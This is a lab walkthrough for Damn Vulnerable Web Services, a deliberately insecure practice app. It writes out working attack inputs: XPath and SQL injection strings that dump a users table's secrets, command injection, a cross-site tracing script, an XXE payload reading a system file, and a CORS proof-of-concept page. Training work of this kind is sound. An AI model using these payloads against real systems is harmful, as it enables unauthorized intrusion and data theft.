Damn Vulnerable Web Services (DVWS) - Walkthrough
Installation
Damn Vulnerable Web Services (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.https://github.com/snoopysecurity/dvws
WSDL Enumeration
Spider DVWS using Burp Suite and look for service.php
Requests processed by SOAP service include check_user_information, owasp_apitop10, population and return_price |
XPATH Injection
User Login:
1' or '1'='1
User Password:
1' or '1'='1
Command Injection
Original Request
parameter value of name is "find" by default |
Edited Request
change the parameter value of name from "find" to "dir" |
Cross Site Tracing (XST)
Hint of "The NuSOAP Library service is vulnerable to a Cross-site scripting flaw" is given by DVWS. Exploit is published at exploit DB (https://www.exploit-db.com/exploits/34565/)
Note: We did the modification on the source code at \dvws\vulnerabilities\xst\xst.php due to improper creation of cookie. The following snippet are moved to the beginning part of the xst.php:
As what mentioned by DVWS, the vulnerable page is /dvws/vulnerabilities/wsdlenum/service.php/
The payload we used to perform XST as below:
<ScrIpt type='text/javascript'>
var req = new XMLHttpRequest();
req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php',false);
req.send();
result=req.responseText;
alert(result);
</scRipT>
URL:
http://localhost/dvws/vulnerabilities/wsdlenum/service.php/<ScrIpt type='text/javascript'>var req = new XMLHttpRequest();req.open('GET', 'http://localhost/dvws/vulnerabilities/xst/xst.php',false);req.send();result=req.responseText;alert(result);</scRipT>
Amend GET method to TRACK method |
Cookie information disclosed |
To understand better with XST, please read the article Penetration Testing with OWASP Top 10 - 2017 A7 Cross-Site Scripting (XSS).
REST API SQL Injection
2 or 1=1
Extract Information
2 UNION SELECT 1,2
2 UNION SELECT database(),@@datadir
Extract Table Name
2 union select group_concat(table_name),database() from information_schema.tables where table_schema = 'dvws'--
Extract Column Name
Dump Data From Extracted Table and Column Names
2 union select group_concat(column_name),database() from information_schema.columns where table_schema='dvws' and table_name='users'--
Dump Data From Extracted Table and Column Names
2 union select id, secret from users--
To understand better with SQL Injection, please read the article Penetration Testing with OWASP Top 10 - 2017 A1 Injection.
XML External Entity 2
<!DOCTYPE uservalue [
<!ENTITY systemEntity SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<uservalue>
<value>&systemEntity;</value>
</uservalue>
Request
Response
JSON Web Token (JWT) Secret Key Brute Force
Correct secret key of 1234567890 found! |
Same Origin Method Execution (SOME)
Cross-Origin Resource Sharing (CORS)
Check if arbitrary origin trusted
Request
Change Origin request header to "http://xyz.com" |
Response
Response shows the application allows access from any domain (origin http://xyz.com) |
Response header Access-Control-Allow-Credentials: true indicates third-party sites may be able to carry out privileged actions and retrieve sensitive information.
Content of cors_poc.html
Content of cors_poc.html
<html>
<head></head>
<body>
<div id="secret"></div>
<script>
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
document.getElementById("secret").innerHTML = this.responseText;
}
};
xhttp.open("POST", "https://192.168.24.2/dvws/vulnerabilities/cors/server.php", true);
xhttp.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
xhttp.send(JSON.stringify({"searchterm":"secretword:one"}));
</script>
</body>
</html>
Request
Response